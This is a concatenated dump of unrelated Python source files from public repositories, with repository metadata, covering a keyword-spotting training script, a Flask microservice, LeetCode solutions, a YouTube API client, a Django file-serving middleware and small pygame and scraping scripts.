How much of the training data should be silence.\n \"\"\")\n 
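The validation loop above weights each batch loss by its true batch size so that the short final batch does not skew the average. Here is the same accumulation isolated as a helper; `eval_batch` is a hypothetical stand-in for the `sess.run` call.

```python
def weighted_mean_loss(set_size, batch_size, eval_batch):
    total = 0.0
    for offset in range(0, set_size, batch_size):
        n = min(batch_size, set_size - offset)  # last batch may be short
        total += eval_batch(offset, n) * n / set_size
    return total
```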
parser.add_argument(\n '--unknown_percentage',\n type=float,\n default=10.0,\n help=\"\"\"\\\n How much of the training data should be unknown words.\n \"\"\")\n parser.add_argument(\n '--time_shift_ms',\n type=float,\n default=100.0,\n help=\"\"\"\\\n Range to randomly shift the training audio by in time.\n \"\"\")\n parser.add_argument(\n '--testing_percentage',\n type=int,\n default=0,\n help='What percentage of wavs to use as a test set.')\n parser.add_argument(\n '--validation_percentage',\n type=int,\n default=10,\n help='What percentage of wavs to use as a validation set.')\n parser.add_argument(\n '--sample_rate',\n type=int,\n default=16000,\n help='Expected sample rate of the wavs', )\n parser.add_argument(\n '--clip_duration_ms',\n type=int,\n default=1000,\n help='Expected duration in milliseconds of the wavs', )\n parser.add_argument(\n '--window_size_ms',\n type=float,\n default=32.0,\n help='How long each spectrogram timeslice is', )\n parser.add_argument(\n '--window_stride_ms',\n type=float,\n default=10.0,\n help='How long each spectrogram timeslice is', )\n parser.add_argument(\n '--how_many_training_steps',\n type=str,\n default='15000,3000',\n help='How many training loops to run', )\n parser.add_argument(\n '--eval_step_interval',\n type=int,\n default=400,\n help='How often to evaluate the training results. and Save model checkpoint every'\n ' save_steps.')\n parser.add_argument(\n '--learning_rate',\n type=float,\n default=0.001,\n help='How large a learning rate to use when training at start.')\n parser.add_argument(\n '--batch_size',\n type=int,\n default=100,\n help='How many items to train with at once', )\n parser.add_argument(\n '--summaries_dir',\n type=str,\n default='.temp/logs',\n help='Where to save summary logs for TensorBoard.')\n parser.add_argument(\n '--wanted_words',\n type=str,\n default='yes,no,up,down,left,right,on,off,stop,go',\n help='Words to use (others will be added to an unknown label)', )\n parser.add_argument(\n '--train_dir',\n type=str,\n default='.temp/ckpts',\n help='Directory to write event logs and checkpoint.')\n parser.add_argument(\n '--start_checkpoint',\n type=str,\n default='',\n help='If specified, restore this pretrained model before any training.')\n parser.add_argument(\n '--model_architecture',\n type=str,\n default='conv',\n help='What model architecture to use')\n parser.add_argument(\n '-chk', '--check_nans',\n action='store_true',\n help='Whether to check for invalid numbers during processing')\n\n FLAGS, unparsed = parser.parse_known_args()\n main([sys.argv[0]] + unparsed)\n\n","repo_name":"msn9110/ezTalk-server","sub_path":"autoencoder/train_v2.py","file_name":"train_v2.py","file_ext":"py","file_size_in_byte":14642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17417922601","text":"import logging\nimport flask_injector\nimport injector\nfrom flask import Flask, jsonify, request\n\nfrom .retriever import BigQuery\nfrom .model import DummyClassifier\nfrom .writer import PostgreSQLDatabase\n\nfrom .dependencies import configure\n\n\ndef create_app(*,\n retriever_class=BigQuery,\n model_class=DummyClassifier,\n writer_class=PostgreSQLDatabase,\n conf=configure):\n app = Flask(\"data-pipeline-ms\")\n\n @app.route('/')\n def hello_world():\n return 'Hello, this is the data pipeline microservice!'\n\n @app.route('/health')\n def healthcheck():\n logging.info(\"Healthcheck endpoint called\")\n return '{\\\"status\\\": \\\"UP\\\"}'\n\n @injector.inject\n 
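Several flags above take comma-separated phase lists (e.g. `--how_many_training_steps='15000,3000'`). A sketch of turning such a flag, paired with a matching rate list, into per-phase tuples; only the step list is actually consumed by this script, so the pairing mirrors the usage described in its comments rather than its code.

```python
def parse_schedule(steps_flag, rates_flag):
    steps = [int(s) for s in steps_flag.split(',')]
    rates = [float(r) for r in rates_flag.split(',')]
    assert len(steps) == len(rates), 'one rate per training phase'
    return list(zip(steps, rates))

print(parse_schedule('10000,3000', '0.001,0.0001'))
# [(10000, 0.001), (3000, 0.0001)]  -- 13,000 steps in total
```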
@app.route('/model', methods=[\"GET\", \"POST\"])\n def apply_model(retriever: retriever_class, model: model_class, writer: writer_class):\n logging.info(\"Modell endpoint called\")\n user = request.values.get(\"user\")\n\n if not user:\n return jsonify(\"Please provide a valid user id\")\n\n data = retriever.get(user)\n result = {user: model.apply(data)}\n writer.write(result)\n return jsonify(\"Model applied\")\n\n flask_injector.FlaskInjector(app=app, modules=[conf])\n\n return app\n\n\nif __name__ == '__main__':\n application = create_app()\n application.run(host='0.0.0.0', port=5000)\n","repo_name":"kaisahling/datapipeline","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14996597115","text":"def fbnq(n):\n if n < 1:\n print(\"输入有误!\")\n return -1\n\n if n == 1 or n == 2:\n return 1\n else:\n return fbnq(n - 1) + fbnq(n - 2)\n\nnum = int(input(\"欲计算的斐波那契数列的第几位数:\"))\nresult = fbnq(num)\nif result != -1:\n print(\"斐波那契数列的第%d个数字是:%d\" % (num , result))\n","repo_name":"wxdespair/wxdespair.github.com","sub_path":"programming_language/Python/clutter/小程序(py格式)/求斐波那契数列之的一个数(递归版).py","file_name":"求斐波那契数列之的一个数(递归版).py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71439799400","text":"import os\nimport csv\nimport json\nimport numpy as np\n\n\ndef load_friends(filepath):\n with open(filepath, 'r') as f:\n friends_raw = json.loads(f.read())\n return {int(uid): set(friend_uids) for uid, friend_uids in friends_raw.items()}\n\n\ndef load_ideology(filepath):\n ideology = {}\n with open(filepath, 'r') as f:\n r = csv.reader(f, delimiter=',')\n next(r)\n for row in r:\n ideology[int(row[0])] = float(row[1])\n return ideology\n\n\ndef load_all_measures(filepath):\n with open(filepath, 'r') as f:\n return [row for row in csv.reader(f, delimiter='\\t')]\n\n\ndef compute_ideology(twitter_uid, friends, ideology):\n scores = []\n if twitter_uid in friends:\n for fuid in friends[twitter_uid]:\n if fuid in ideology:\n scores.append(ideology[fuid])\n if len(scores) > 0:\n return np.average(scores)\n else:\n return None\n\n\ndef compute_ideologies(measures, friends, ideology_map):\n scores = {}\n for i in range(1, len(measures)):\n uid = int(measures[i][0])\n curr = compute_ideology(uid, friends, ideology_map)\n if curr is not None:\n scores[uid] = curr\n return scores\n\n\ndef compute_friends_ideology(uid, friends, ideologies):\n scores = []\n if uid in friends:\n for fuid in friends[uid]:\n if fuid in ideologies:\n scores.append(ideologies[fuid])\n if len(scores) > 0:\n return np.average(scores)\n else:\n return None\n\nif __name__ == '__main__':\n print('Reading friends.')\n\n retweets = 'with-retweets'\n \n #ideology_map = load_ideology(os.path.join(os.getenv('D'), 'congress', 'final-ideology-map-senate.csv'))\n ideology_map = load_ideology(os.path.join(os.getenv('D'), 'congress', 'ideology-senate.csv'))\n measures = load_all_measures(os.path.join(os.getenv('D'), 'measures', retweets, 'partisanship.tab'))\n friends = load_friends(os.path.join(os.getenv('D'), 'friends.json'))\n \n ideologies = compute_ideologies(measures, friends, ideology_map)\n \n print('ideologies len: {}'.format(len(ideologies)))\n \n dest = os.path.join(os.getenv('D'), 'measures', retweets, 'ideology.tab')\n\n with open(dest, 'w') as f:\n w = csv.writer(f, delimiter='\\t')\n 
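The recursive Fibonacci above recomputes each subproblem exponentially many times. A sketch of the same function with memoization via `functools.lru_cache` keeps the recursive shape but runs in linear time:

```python
from functools import lru_cache

@lru_cache(maxsize=None)
def fib(n):
    if n < 1:
        raise ValueError('n must be >= 1')
    if n <= 2:
        return 1
    return fib(n - 1) + fib(n - 2)

print(fib(50))  # 12586269025, effectively instant
```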
w.writerow(['Twitter ID', 'Ideology'])\n for i in range(1, len(measures)):\n row = measures[i]\n uid = int(row[0])\n if uid in ideologies:\n w.writerow([uid, ideologies[uid]])\n '''\n friends_ideology = compute_friends_ideology(uid, friends, ideologies)\n if friends_ideology is not None:\n row.extend([ideologies[uid], friends_ideology])\n w.writerow(row)\n '''\n","repo_name":"osome-iu/misinfo-partisanship-hksmisinforeview-2021","sub_path":"scripts/compute_ideology.py","file_name":"compute_ideology.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"11517609256","text":"from collections import deque\n\nfrom utils import list2binary_tree\n\n\ndef rightSideView(root):\n \"\"\"\n BFS, with res storing every node\n Time: O(n)\n Space: O(n) que and res\n \"\"\"\n if not root:\n return root\n res = []\n que = deque([(root, 1)])\n # similar approach in level order traversal, but only get the last node in every level now (right most node)\n while que:\n curr_node, level = que.popleft()\n if curr_node.left:\n que.append((curr_node.left, level + 1))\n if curr_node.right:\n que.append((curr_node.right, level + 1))\n\n if len(res) < level:\n res.append([curr_node.val])\n else:\n res[level - 1].append(curr_node.val)\n\n return [lev[-1] for lev in res]\n\n\ndef rightSideView_alt(root):\n \"\"\"\n BFS with level indicator\n Time: O(n)\n Space: O(d) d the diameter of the tree, however in worst case D could be n/2 thus O(n)\n \"\"\"\n if not root:\n return root\n res = []\n # None indicates the end of a level\n que = deque([root, None])\n # maintain curr and prev so that when curr points to None, prev should be the right most node in that layer\n curr = root\n\n while que:\n prev, curr = curr, que.popleft()\n if curr:\n if curr.left:\n que.append(curr.left)\n if curr.right:\n que.append(curr.right)\n else:\n # prev now points to the right most node in the current layer\n res.append(prev.val)\n # just to make sure we won't run into an infinite loop\n if que:\n que.append(None)\n\n return res\n\n\ntest = list2binary_tree([3, 9, 20, 6, None, 15, 7, 8])\nprint(rightSideView_alt(test))\n","repo_name":"filozyu/leetcode-journey","sub_path":"src/binary-tree/binary_tree_right_side_view.py","file_name":"binary_tree_right_side_view.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24840778449","text":"#! 
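For contrast with the two BFS variants above, the right side view can also be taken with a DFS that visits the right child first and records the first node reached at each depth — O(n) time, O(h) stack space:

```python
def rightSideView_dfs(root):
    res = []

    def dfs(node, depth):
        if not node:
            return
        if depth == len(res):       # first node seen at this depth
            res.append(node.val)
        dfs(node.right, depth + 1)  # right subtree first
        dfs(node.left, depth + 1)

    dfs(root, 0)
    return res
```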
/usr/bin/env python\n\n\ndef gifts(b, w, x, y, z):\n b_cost = x if y + z > x else y + z\n w_cost = y if x + z > y else x + z\n return b * b_cost + w * w_cost\n\n\nif __name__ == '__main__':\n t = int(input())\n for _ in range(t):\n b, w = [int(x) for x in input().split()]\n x, y, z = [int(x) for x in input().split()]\n print(gifts(b, w, x, y, z))\n","repo_name":"ahavrylyuk/hackerrank","sub_path":"python3/taum_and_bday.py","file_name":"taum_and_bday.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32581240000","text":"import numpy as np\nfrom os import path, getcwd\nimport pickle\nimport copy\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1.inset_locator import (inset_axes, InsetPosition,\n mark_inset)\nfrom matplotlib import cm as cm\nfrom matplotlib import mlab as ml\nimport matplotlib.lines as mlines\nfrom plotter_params import plot_setup\n\nplot_setup()\n\nqubits = [2, 3, 5]\n\nsavefile = path.join(getcwd(), \"data\", \"zero_fidelity_comparison\")\n\np_fidels = []\nzero_fidels = []\nfor nqubits in qubits:\n with open(path.join(savefile, f\"{nqubits}_q_process_fidelities.pickle\"), 'rb') as f:\n _fs = pickle.load(f)\n p_fidels.append(copy.copy(_fs))\n\n with open(path.join(savefile, f\"{nqubits}_q_zero_fidelities.pickle\"), 'rb') as f:\n _fs = pickle.load(f)\n zero_fidels.append(copy.copy(_fs))\n\nfig, ax = plt.subplots(1, 1)\nfig.set_figheight(3.3858)\n\ncol_cyc = plt.rcParams['axes.prop_cycle'].by_key()['color']\n\nmarkers = []\nlabels = []\nfor i, zero_fidel in enumerate(zero_fidels):\n plt.hexbin(p_fidels[i], zero_fidel, color=col_cyc[i], mincnt=1, bins=1,\n gridsize=300, alpha=0.15)\n markers.append(mlines.Line2D([], [], color=col_cyc[i], marker='.', markersize=10,\n lw=0.0, alpha=0.3))\n labels.append(rf\"{qubits[i]} qubits\")\n plt.plot(p_fidels[i], p_fidels[i], color='black', lw=0.5)\n\nplt.legend(tuple(markers), tuple(labels), frameon=False, handletextpad=0.1, loc=2)\n\n\nplt.xlabel(r'Process Fidelity (F)')\nplt.ylabel(r'$0-$Fidelity ($\\tilde{F}_0$)')\n\naxins = inset_axes(ax, width=\"40%\", height=\"40%\", loc=4)\nip = InsetPosition(ax, [0.575, 0.15, 0.425, 0.275])\naxins.set_axes_locator(ip)\n\nfor i, zero_fidel in enumerate(zero_fidels):\n _log_pf = [np.log10(1-j) for j in p_fidels[i]]\n _log_zf = [np.log10(zero_fidel[j]-k) for j, k in enumerate(p_fidels[i])]\n plt.hexbin(_log_pf, _log_zf, alpha=0.3, gridsize=75, mincnt=1, color=col_cyc[i])\n plt.xlabel(r'$|1-F|$')\n plt.ylabel(r'$|F-\\tilde{F}_0|$')\n axins.spines['top'].set_visible(True)\n axins.spines['right'].set_visible(True)\n plt.yticks([-7, -4, -1], labels=[r'$10^{-7}$', r'$10^{-4}$', r'$10^{-1}$'])\n plt.xticks([-6, -4, -2], labels=[r'$10^{-6}$', r'$10^{-4}$', r'$10^{-2}$'])\n axins.invert_yaxis()\n axins.invert_xaxis()\n plt.minorticks_off()\n\nplt.savefig(path.join(savefile, \"comparing_FOMS_hex.pdf\"))\nplt.show()\n","repo_name":"greenawaysean/bayesianCircuitOptimisation","sub_path":"plot_zero_fidelity_comparison.py","file_name":"plot_zero_fidelity_comparison.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"69947077479","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nimport csv\r\n\r\nresults = []\r\ndef scraper():\r\n print(\"Gathering data...\")\r\n #Load webpage\r\n url = 'https://olympics.com/tokyo-2020/olympic-games/en/results/all-sports/medal-standings.htm' \r\n response = 
requests.get(url)\r\n\r\n #parse webpage\r\n soup = BeautifulSoup(response.content, \"html5lib\")\r\n\r\n #grab results table, rows\r\n table = soup.find('tbody')\r\n tableRows = table.find_all(\"tr\")\r\n\r\n #loop thru each row\r\n for row in tableRows:\r\n #Rank, Team/NOC, Gold, Silver, Bronze, Total, Rank by Toal\r\n result = []\r\n\r\n #Ranks, Medal Tags are listed under td tags with class text-center\r\n #for each tag, grab value\r\n #grabs rank, gold, silver, bronze, total, rank by total in that order\r\n\r\n columns = row.find_all(\"td\", class_=\"text-center\")\r\n \r\n for column in columns: \r\n if column.text:\r\n result.append(column.text.strip())\r\n \r\n #grab team, insert it into second position\r\n team = row.find(\"a\", class_=\"country\")\r\n if team != None:\r\n result.insert(1,team.text)\r\n #add result to results list\r\n if result:\r\n results.append(result)\r\n \r\ndef writeOut():\r\n filename = 'olympic_medal_count.csv'\r\n fields = ['Rank', 'Team/NOC','Gold Count', 'Silver Count', 'Bronze Count', 'Total', 'Rank by Total']\r\n print(\"Preparing to Write Data to \" + filename)\r\n\r\n#CHANGE BACK TO A\r\n with open(filename, 'w') as csvfile:\r\n writer = csv.writer(csvfile,lineterminator='\\n')\r\n writer.writerow(fields)\r\n for line in results:\r\n writer.writerow(line)\r\n print(filename + \" successfully written\")\r\n\r\ndef main():\r\n scraper()\r\n writeOut()\r\nmain()\r\n","repo_name":"stone662/OlympicScraper","sub_path":"medalScraper_requests.py","file_name":"medalScraper_requests.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22914531315","text":"class Solution:\n def exist(self, board: List[List[str]], word: str) -> bool:\n m = len(board)\n n = len(board[0])\n\n vects = [(1, 0), (0, 1), (-1, 0), (0, -1)]\n history = set()\n isFound = False\n\n def findWord(coordi, lword, history):\n nonlocal isFound\n\n if isFound or coordi in history:\n return\n\n x, y = coordi[0], coordi[1]\n\n if board[y][x] == lword[0]:\n history.add((x, y))\n\n if not lword[1:]:\n isFound = True\n return\n\n for vect in vects:\n nx = x + vect[0]\n ny = y + vect[1]\n\n if 0 <= nx < n and 0 <= ny < m:\n findWord((nx, ny), lword[1:], history)\n\n history.remove((x, y))\n\n for i in range(m):\n for j in range(n):\n findWord((j, i), word, set())\n\n return isFound\n","repo_name":"sigmarion1/daily-algo","sub_path":"leetcode-top-interview-150/79.py","file_name":"79.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21482020330","text":"from googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom googleapiclient.http import HttpRequest\nimport requests\nimport pandas as pd\nimport json\nfrom utils import duration_to_second, utc_to_local, get_current_time, covert_to_millions\n\nclass YoutubeVideo:\n YOUTUBE_API_SERVICE_NAME = \"youtube\"\n YOUTUBE_API_VERSION = \"v3\"\n ID_SIZE_LIMIT = 50\n YOUTUBE_SEARCH_API_URL = \"https://youtube-search-and-download.p.rapidapi.com/trending\"\n\n def __init__(self, youtube_api_key: str, rapid_api_key: str):\n self.youtube_api_key = youtube_api_key\n self.rapid_api_key = rapid_api_key\n try:\n self.youtube = build(self.YOUTUBE_API_SERVICE_NAME, self.YOUTUBE_API_VERSION, developerKey=self.youtube_api_key)\n except Exception as e:\n print(f\"Found error when building youtube video: {e}\")\n raise\n\n\n def 
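The board word search above tracks visited cells in a set plus a `nonlocal` found flag. A compact sketch of the same backtracking marks a cell by overwriting it and restores it on the way out, so no auxiliary structure is needed:

```python
def exist(board, word):
    m, n = len(board), len(board[0])

    def dfs(y, x, k):
        if board[y][x] != word[k]:
            return False
        if k == len(word) - 1:
            return True
        board[y][x] = '#'  # mark visited for the current path
        found = any(
            0 <= y + dy < m and 0 <= x + dx < n and dfs(y + dy, x + dx, k + 1)
            for dy, dx in ((1, 0), (-1, 0), (0, 1), (0, -1))
        )
        board[y][x] = word[k]  # restore on backtrack
        return found

    return any(dfs(i, j, 0) for i in range(m) for j in range(n))
```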
get_category(self, category_id: str) -> str:\n \"\"\" Return category title of a given category id \"\"\"\n \n category_data = self.youtube.videoCategories().list(part='snippet', id=category_id).execute()\n\n try:\n # Extract the category name from the category data\n category_name = category_data['items'][0]['snippet']['title']\n except:\n print(\"Something went wrong in get_category_name, please check the API docs\")\n return \"\"\n \n return category_name\n \n\n def get_trending_ids(self) -> list:\n \"\"\"\n Return a list of ids of trending \"now\" videos\n\n Use the Youtube Search and Download API because it returns videos \n the same order as in https://www.youtube.com/feed/trending\n API can be found here: https://rapidapi.com/h0p3rwe/api/youtube-search-and-download\n \n Type of trending videos:\n n - now (default)\n mu - music\n mo - movies\n g - gaming\n \"\"\"\n\n querystring = {\"type\":\"n\",\"hl\":\"en\",\"gl\":\"US\"}\n url = self.YOUTUBE_SEARCH_API_URL\n headers = {\n \"X-RapidAPI-Key\": self.rapid_api_key,\n \"X-RapidAPI-Host\": \"youtube-search-and-download.p.rapidapi.com\"\n }\n\n try:\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n response_json = response.json() \n contents = response_json['contents']\n ids = [content[\"video\"][\"videoId\"] for content in contents]\n\n return ids\n \n except Exception as e:\n if \"message\" in response_json:\n e = response_json[\"message\"]\n print(f\"Rapid API error: {e}\")\n raise\n \n\n def handle_api_error(self, e: HttpError): \n try:\n error_content = json.loads(e.content)\n error_msg = error_content.get('error', {}).get('message')\n except:\n error_msg = e\n\n print(f\"API error: {error_msg}\")\n raise\n\n\n def get_response_items(self, request: HttpRequest):\n try:\n response = request.execute()\n items = response['items']\n if len(items) == 0:\n print(f\"No response items returned from the API\")\n return None\n\n return items\n \n except HttpError as e:\n self.handle_api_error(e)\n return None\n\n\n def get_videos_by_ids(self, ids: list) -> pd.DataFrame:\n \"\"\"\n Return a dataframe of Youtube videos\n Refer to https://developers.google.com/youtube/v3/docs/videos/list\n \"\"\"\n # will get 400 error code when there are too many ids in `id` input\n if len(ids) > self.ID_SIZE_LIMIT:\n print(f\"Please make sure the # of id <= {self.ID_SIZE_LIMIT}.\")\n return []\n \n # store attributes of videos\n video_ids = []\n titles = []\n all_published_at = []\n durations = []\n views = []\n categories = []\n all_tags = []\n channel_ids = []\n channel_titles = []\n all_extracted_at = []\n ranks = []\n rank = 1\n df = pd.DataFrame()\n\n # call the API to get videos by ids\n request = self.youtube.videos().list(\n part=\"snippet,contentDetails,statistics\",\n maxResults=self.ID_SIZE_LIMIT,\n id=ids\n )\n\n items = self.get_response_items(request)\n for item in items:\n try:\n try:\n tags = item[\"snippet\"][\"tags\"]\n except:\n tags = \"\"\n \n try:\n published_at = utc_to_local(item[\"snippet\"][\"publishedAt\"])\n except:\n published_at = \"\"\n \n video_ids.append(item[\"id\"])\n titles.append(item[\"snippet\"][\"title\"])\n durations.append(duration_to_second(item[\"contentDetails\"][\"duration\"]))\n views.append(covert_to_millions(item[\"statistics\"].get(\"viewCount\", 0)))\n categories.append(self.get_category(item[\"snippet\"][\"categoryId\"]))\n channel_ids.append(item[\"snippet\"][\"channelId\"])\n channel_titles.append(item[\"snippet\"][\"channelTitle\"])\n all_tags.append(tags)\n 
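The bare `try/except` blocks above guard against keys missing from the API response, but they also swallow unrelated errors. A sketch of the same guards written with chained `.get()` calls:

```python
def video_fields(item):
    snippet = item.get('snippet', {})
    return {
        'tags': snippet.get('tags', []),
        'published_at': snippet.get('publishedAt', ''),
        'channel_id': snippet.get('channelId', ''),
    }
```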
all_published_at.append(published_at)\n all_extracted_at.append(get_current_time())\n ranks.append(rank)\n rank += 1\n except Exception as e:\n print(f\"Something went wrong in get_videos_by_ids: {e}\")\n return df\n\n df = pd.DataFrame({\n 'video_id': video_ids,\n 'title': titles,\n 'duration_sec': durations,\n 'views_millions': views,\n 'category': categories,\n 'channel_id': channel_ids,\n 'channel_title': channel_titles,\n 'tags': all_tags,\n 'published_at': all_published_at,\n 'extracted_at': all_extracted_at,\n 'rank': ranks\n })\n\n return df\n\n \n def get_channels_by_ids(self, ids: list) -> pd.DataFrame:\n \"\"\"\n Return a dataframe of Youtube channels\n Refer to https://developers.google.com/youtube/v3/docs/channels/list\n \"\"\"\n \n # will get 400 error code when there are too many video ids in `id` input\n if len(ids) > self.ID_SIZE_LIMIT:\n print(f\"Please make sure the # of id <= {self.ID_SIZE_LIMIT}.\")\n return []\n\n # store attributes of channels\n channel_ids = []\n titles = []\n urls = []\n countries = []\n all_published_at = []\n\n # call the API to get channels by ids\n request = self.youtube.channels().list(\n part=\"snippet\",\n maxResults=self.ID_SIZE_LIMIT,\n id=ids\n )\n items = self.get_response_items(request)\n\n for item in items:\n try:\n try:\n url = item[\"snippet\"][\"customUrl\"]\n except:\n url = \"\"\n try:\n country = item[\"snippet\"][\"country\"]\n except:\n country = \"\"\n try:\n published_at = utc_to_local(item[\"snippet\"][\"publishedAt\"])\n except:\n published_at = \"\"\n\n channel_ids.append(item[\"id\"])\n titles.append(item[\"snippet\"][\"title\"])\n urls.append(url)\n countries.append(country)\n all_published_at.append(published_at)\n except Exception as e:\n print(f\"Something went wrong in get_channels_by_ids: {e}\")\n return []\n \n # save info of channels as dataframe\n df = pd.DataFrame({\n 'channel_id': channel_ids,\n 'channel_title': titles,\n 'custom_url': urls,\n 'country': countries,\n 'published_at': all_published_at\n })\n\n return df\n \n\n def get_combined_data(self, ids: list, request_method: callable, chunk_size: int) -> pd.DataFrame:\n \"\"\" Concat the result of calling request_method\n whose parameter is the ids split by chunk_size\n \"\"\"\n\n chunk_index = 0\n df_combined = pd.DataFrame()\n\n while ids:\n try:\n chunk_ids, ids = ids[:chunk_size], ids[chunk_size:]\n chunk_data = request_method(chunk_ids)\n if \"rank\" in chunk_data.columns:\n # store the index of ranking\n chunk_data[\"rank\"] = chunk_data[\"rank\"] + chunk_index * 50\n chunk_index += 1\n df_combined = pd.concat([df_combined, chunk_data])\n\n except Exception as e:\n print(f\"Found error in get_combined_data: {e}\")\n raise\n\n return df_combined\n \n \n def get_all_videos(self, ids: list) -> pd.DataFrame:\n all_videos = self.get_combined_data(ids=ids, \n request_method=self.get_videos_by_ids, \n chunk_size=self.ID_SIZE_LIMIT)\n\n if \"video_id\" in all_videos.columns:\n # drop duplicates\n all_videos = all_videos.drop_duplicates(subset=[\"video_id\"])\n\n return all_videos\n \n def get_all_channels(self, ids: list) -> pd.DataFrame:\n all_channels = self.get_combined_data(ids=ids, \n request_method=self.get_channels_by_ids, \n chunk_size=self.ID_SIZE_LIMIT)\n if \"channel_id\" in all_channels.columns:\n # drop duplicates\n all_channels = all_channels.drop_duplicates(subset=[\"channel_id\"])\n\n return 
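`get_combined_data` above consumes the id list in slices of `ID_SIZE_LIMIT` because the videos/channels endpoints reject requests with more than 50 ids. The slicing idiom, isolated as a generator:

```python
def chunks(ids, size=50):
    while ids:
        head, ids = ids[:size], ids[size:]
        yield head

for batch in chunks(list(range(120))):
    print(len(batch))  # 50, 50, 20
```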
all_channels\n","repo_name":"eeliuqin/Youtube-Trending-Videos-Pipeline-and-Analysis","sub_path":"youtube_video.py","file_name":"youtube_video.py","file_ext":"py","file_size_in_byte":9885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21813605777","text":"# I want you to have a think about what you just saw in the slides\n# and see if you can create a function called add\n# where you can pass in as many numbers as you want\n# and it will always add together all of the numbers that are being passed into the function as the input,\n# and then return the total sum.\n\n\"\"\"\nhere is my code\ndef add(*args):\n print(args)\n return sum(args)\n\n\nadd(10,4,3)\n\"\"\"\n\ndef add(*args):\n print(args[1])\n sum = 0\n for n in args:\n sum += n\n return sum\n\nprint(add(3,5,6, 2, 1))\n\n\n","repo_name":"ahudspeth199/100_days_of_code","sub_path":"src/day_27_notes/playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41381838714","text":"#https://www.codechef.com/problems/MATCHES\n\nl = [6,2,5,5,4,5,6,3,7,6]\nfor _ in range(int(input())):\n a,b=map(int,input().split())\n sum = str(a+b)\n ans = 0\n for i in sum:\n ans += l[int(i)]\n print(ans)","repo_name":"viveakrt/Competitive-programing","sub_path":"CodeChef/MATCHES_playing with matches.py","file_name":"MATCHES_playing with matches.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"18"} +{"seq_id":"20998102783","text":"import os\nimport six\n\nfrom django.conf import settings\nfrom django.core.files.base import File\nfrom django.http import HttpResponse, HttpResponseNotFound, FileResponse\n\ntry:\n from django.utils.deprecation import MiddlewareMixin\nexcept ImportError:\n MiddlewareMixin = object\n\nclass FileProvider(object):\n def get_response(self, response, **options):\n return self._get_response(response, **options)\n\n def _get_response(self, response, **options):\n raise NotImplemented\n\nclass XAccelFileProvider(FileProvider):\n def _get_response(self, response, **options):\n response['X-Accel-Redirect'] = response['X-File']\n del response['X-File']\n return response\n\nclass XSendFileProvider(FileProvider):\n def _get_response(self, response, **options):\n response['X-Sendfile'] = response['X-File']\n del response['X-File']\n return response\n\nclass XReproxyFileProvider(FileProvider):\n def _get_response(self, response, **options):\n response['X-Reproxy-URL'] = response['X-File']\n del response['X-File']\n return response\n\nclass PythonFileProvider(FileProvider):\n def _get_response(self, response, **options):\n # only need this checking when python file provider is given\n if not os.path.exists(response['X-File']):\n return HttpResponseNotFound(\"file not found\")\n return FileResponse(open(response['X-File'], 'rb'))\n\n# Uses X-Sendfile\nApacheFileProvider = XSendFileProvider\nLightHttpdFileProvider = XSendFileProvider\nHiawathaFileProvider = XSendFileProvider\n# Uses X-Accel-Redirect\nNginxFileProvider = XAccelFileProvider\nCaddyFileProvider = XAccelFileProvider\nProxygenFileProvider = XAccelFileProvider\nReproxyFileProvider = XReproxyFileProvider\nH2OFileProvider = ReproxyFileProvider\n\nPROVIDERS = {\n 'python': PythonFileProvider,\n 'nginx': NginxFileProvider,\n 'apache': ApacheFileProvider,\n 'lighthttpd': LightHttpdFileProvider,\n 'caddy': 
CaddyFileProvider,\n 'hiawatha': HiawathaFileProvider,\n 'proxygen': ProxygenFileProvider,\n 'reproxy': ReproxyFileProvider,\n 'h2o': H2OFileProvider,\n 'uwsgi': XSendFileProvider,\n 'xaccel': XAccelFileProvider,\n 'xsendfile': XSendFileProvider,\n}\n\nclass FileProviderMiddleware(MiddlewareMixin):\n def process_response(self, request, response):\n filepath = response.get('X-File', \"\")\n if filepath != \"\" and isinstance(filepath, six.string_types):\n provider_name = getattr(settings, \"FILEPROVIDER_NAME\", \"python\")\n provider = getattr(settings, \"FILEPROVIDER_BACKEND\", None)\n if not provider:\n provider = PROVIDERS[provider_name]\n response = provider().get_response(response)\n return response\n","repo_name":"sideffect0/django-fileprovider","sub_path":"fileprovider/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"18"} +{"seq_id":"23870498062","text":"# ===== Inicialização =====\n# ----- Importa e inicia pacotes\n\nimport pygame\nimport random\nfrom assets import CANHAO_IMG\n\nfrom config import IMG_DIR\npygame.init()\n\n# ----- Gera tela principal\nWIDTH = 920\nHEIGHT = 690\nwindow = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption('Teste')\n\n# ----- Inicia assets\nfundo = pygame.image.load('assets/img/praia.png').convert()\nfonte = 